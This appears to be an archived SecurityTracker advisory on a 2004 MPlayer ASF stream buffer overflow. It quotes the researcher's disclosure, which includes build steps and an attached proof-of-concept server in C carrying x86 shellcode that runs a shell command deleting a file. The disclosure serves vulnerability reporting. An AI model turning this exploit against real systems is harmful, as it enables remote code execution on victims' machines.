SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Multimedia)  >   MPlayer Vendors:   mplayerhq.hu
MPlayer Buffer Overflow in Processing ASF Streams Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012562
SecurityTracker URL:  http://securitytracker.com/id/1012562
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0pre5
Description:   A vulnerability was reported in MPlayer in the processing of ASF streams. A remote user can cause arbitrary code to be executed by the target user.

D. J. Bernstein reported that a remote user can create a specially crafted ASF video stream that, when viewed by the target user with MPlayer, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

The buffer overflow resides in the get_data() function called by the get_header() function in 'asf_mmst_streaming.c'.

Ariel Berkman is credited with discovering this flaw.
Impact:   A remote user can cause arbitrary code to be executed by the target user with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  mplayerhq.hu/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 24 2004 (Mandrake Issues Fix) MPlayer Buffer Overflow in Processing ASF Streams Lets Remote Users Execute Arbitrary Code   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.


 Source Message Contents
Date:  15 Dec 2004 08:18:11 -0000
Subject:  [remote] [control] MPlayer 1.0pre5 get_header overflows data buffer



--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has
discovered a remotely exploitable security hole in MPlayer. I'm
publishing this notice, but all the discovery credits should be assigned
to Berkman.

You are at risk if you use MPlayer to play an ASF video stream from the
web (or from any other source that could be controlled by an attacker).
Whoever provides that stream then has complete control over your
account: he can read and modify your files, watch the programs you're
running, etc.

Proof of concept: On an x86 computer running FreeBSD 4.10 with ucspi-tcp
installed, type

   wget http://ftp5.mplayerhq.hu/mplayer/releases/MPlayer-1.0pre5.tar.bz2
   bunzip2 < MPlayer-1.0pre5.tar.bz2 | tar -xf -
   cd MPlayer-1.0pre5
   ./configure
   gmake

to download and compile the MPlayer program, version 1.0pre5 (current).
Then save the file 17-s.c attached to this message, and type

   gcc -o 17-s 17-s.c
   tcpserver 0 1755 ./17-s &
   ./mplayer mmst://127.0.0.1/new_video.asf

with the unauthorized result that a file named x is removed from the
current directory. (I tested this with a 538-byte environment, as
reported by printenv | wc -c.)

Here's the bug: In asf_mmst_streaming.c, get_header() uses get_data()
to copy an input-specified amount of data into a 102400-byte data[]
array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="17-s.c"

char payload[] = {
 0xeb ,0x47
 ,0x59
 ,0x89 ,0xca
 ,0x83 ,0xc2 ,0x18
 ,0x89 ,0x11
 ,0x31 ,0xc0
 ,0x89 ,0x41 ,0x04
 ,0x83 ,0xc2 ,0x13
 ,0x89 ,0x51 ,0x08
 ,0x83 ,0xc2 ,0x08
 ,0x89 ,0x51 ,0x0c
 ,0x83 ,0xc2 ,0x03
 ,0x89 ,0x51 ,0x10
 ,0x89 ,0x41 ,0x14
 ,0x88 ,0x41 ,0x2a
 ,0x88 ,0x41 ,0x32
 ,0x88 ,0x41 ,0x35
 ,0x88 ,0x41 ,0x3a
 ,0x51
 ,0x83 ,0xc1 ,0x08
 ,0x51
 ,0x83 ,0xc1 ,0x20
 ,0x83 ,0xc1 ,0x03
 ,0x51
 ,0x83 ,0xc0 ,0x3b
 ,0x50
 ,0xcd ,0x80
 ,0x31 ,0xc0
 ,0x50
 ,0x40
 ,0x50
 ,0xcd ,0x80
 ,0xe8 ,0xb4 ,0xff ,0xff ,0xff
 ,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
 ,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
 ,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
 ,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
 ,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
 ,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
 ,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
 ,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
 ,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
 ,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;

#include <stdio.h>

main()
{

char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++) 
        putchar('A');
for (i=0;i<sizeof payload;i++)
        putchar (payload[i]);

printf("123");
for (i=0;i<20000;i++)           // RA all the way....
{
        putchar(0x01);
        putchar(0x15);
        putchar(0xbb);
        putchar(0xbf);
}
fflush(stdout);
}

--T4sUOijqQbZv57TR--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC